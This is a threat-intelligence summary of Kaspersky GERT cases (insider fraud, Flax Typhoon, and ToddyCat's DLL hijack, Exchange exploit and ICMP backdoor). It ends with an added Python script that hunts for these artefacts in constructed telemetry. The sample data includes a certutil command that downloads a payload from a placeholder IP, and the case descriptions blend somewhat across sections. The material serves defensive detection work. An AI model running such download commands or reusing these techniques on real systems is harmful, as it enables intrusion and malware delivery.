ToddyCat is an APT group active since December 2020 that targets government and military entities in Europe and Asia. The group is known for sophisticated cyber-espionage; Kaspersky Lab found it exploiting SMB, the IKEEXT service, and an Exchange RCE vulnerability to deploy an ICMP backdoor.
ToddyCat APT
In 2023, Kaspersky GERT uncovered a major internal fraud in a government organization, where threat actors used an internal service to steal over $20 million.
GERT’s DFIR analysis uncovered several attack vectors:
- A debugging interface vulnerability for cookie theft and user impersonation.
- Privilege escalation and account manipulation for fraudulent transactions.
- Unauthorized VPN access from external and internal networks.
The team connected user activities across different systems, including both local and remote IDs, to confirm that internal actors were working together.
This case highlights the critical need for strong internal controls, effective privileged access management, and comprehensive logging to identify and address insider threats in financial systems.
Additionally, Kaspersky uncovered a sophisticated attack that had been ongoing in a customer’s infrastructure for over two years, revealing the depth and persistence of the intrusion.
The Flax Typhoon APT group used living-off-the-land techniques, abusing SoftEther VPN and the Zabbix agent for purposes they were never deployed for. They delivered malware via Windows LOLBins such as certutil and disguised their services to avoid detection.
The attack involved NTDS dumping, Mimikatz, and Cobalt Strike, including the creation of firewall rules for hidden communication. As a result, the client successfully sued the insider employee and accomplices, highlighting the critical need for APT detection solutions to identify and eliminate long-term threats.
GERT’s assessment confirmed the attack timeline, the compromised users, and the execution methods. The investigation revealed SMB abuse, persistence through the IKEEXT service, and exploitation of the CVE-2021-26855 vulnerability in Microsoft Exchange Server.
A malicious wlbsctrl.dll was used for persistence and lateral movement via SMB. An ICMP backdoor was found embedded in an application, featuring mutex checking, registry manipulation, and encrypted payload execution.
The backdoor used AES encryption with the C drive’s volume serial number as a key parameter. Payloads were injected into dllhost.exe, which created ICMP sockets, received Base64-encoded data, and executed encrypted shellcode.
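The persistence and execution artefacts above (a planted wlbsctrl.dll loaded by the IKEEXT service host, certutil used as a downloader, and dllhost.exe started outside its normal COM Surrogate pattern) translate directly into hunting rules. The following is an added example, not code from the Kaspersky report; it runs three such rules over constructed Sysmon-style events, and every path, command line and parent process in the sample data is illustrative.

```python
# Added example (not from the Kaspersky GERT report): hunting rules for the
# ToddyCat indicators described above, run over constructed Sysmon-style
# events (id 7 = image load, id 1 = process create).
import re

SYSTEM32 = r"c:\windows\system32"

EVENTS = [  # constructed sample telemetry; nothing here is real case data
    {"id": 7, "image": r"C:\Windows\System32\svchost.exe",
     "loaded": r"C:\Windows\System32\wlbsctrl.dll"},
    {"id": 7, "image": r"C:\Windows\System32\svchost.exe",
     "loaded": r"C:\Windows\System32\kernel32.dll"},
    {"id": 1, "image": r"C:\Windows\System32\certutil.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil -urlcache -split -f http://203.0.113.5/a.txt a.dll"},
    {"id": 1, "image": r"C:\Windows\System32\certutil.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil -hashfile setup.msi SHA256"},
    {"id": 1, "image": r"C:\Windows\System32\dllhost.exe",
     "parent": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "cmdline": "dllhost.exe"},
    {"id": 1, "image": r"C:\Windows\System32\dllhost.exe",
     "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": "dllhost.exe /Processid:{00000000-0000-0000-0000-000000000000}"},
]

def rule_ikeext_phantom_dll(ev):
    # IKEEXT (hosted in svchost.exe) probes for wlbsctrl.dll, which a default
    # install does not ship; a copy appearing in System32 is the persistence seen here.
    return (ev["id"] == 7 and ev["image"].lower().endswith(r"\svchost.exe")
            and ev["loaded"].lower() == SYSTEM32 + r"\wlbsctrl.dll")

def rule_certutil_lolbin(ev):
    # certutil acting as a downloader/decoder instead of doing certificate work.
    return (ev["id"] == 1 and ev["image"].lower().endswith(r"\certutil.exe")
            and re.search(r"-(urlcache|decode|encode)\b", ev["cmdline"], re.I) is not None)

def rule_odd_dllhost(ev):
    # Legitimate COM Surrogate is started from System32 with a /Processid:{GUID}
    # argument; a bare dllhost.exe from a user-writable parent is an injection candidate.
    if ev["id"] != 1 or not ev["image"].lower().endswith(r"\dllhost.exe"):
        return False
    return (not ev["parent"].lower().startswith(SYSTEM32)
            or "/processid:" not in ev["cmdline"].lower())

RULES = {"ikeext_phantom_dll": rule_ikeext_phantom_dll,
         "certutil_lolbin": rule_certutil_lolbin,
         "suspicious_dllhost": rule_odd_dllhost}

def hunt(events):
    """Return (rule_name, event_index) for every event matching a rule."""
    return [(name, i) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]
```

Running `hunt(EVENTS)` flags events 0, 2 and 4 and leaves the benign kernel32 load, the certutil hash check and the normally parented dllhost.exe alone.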
While the attack shows ToddyCat’s TTPs, full attribution is unclear. The case underscores the importance of asset surveillance, threat intelligence, and MDR services.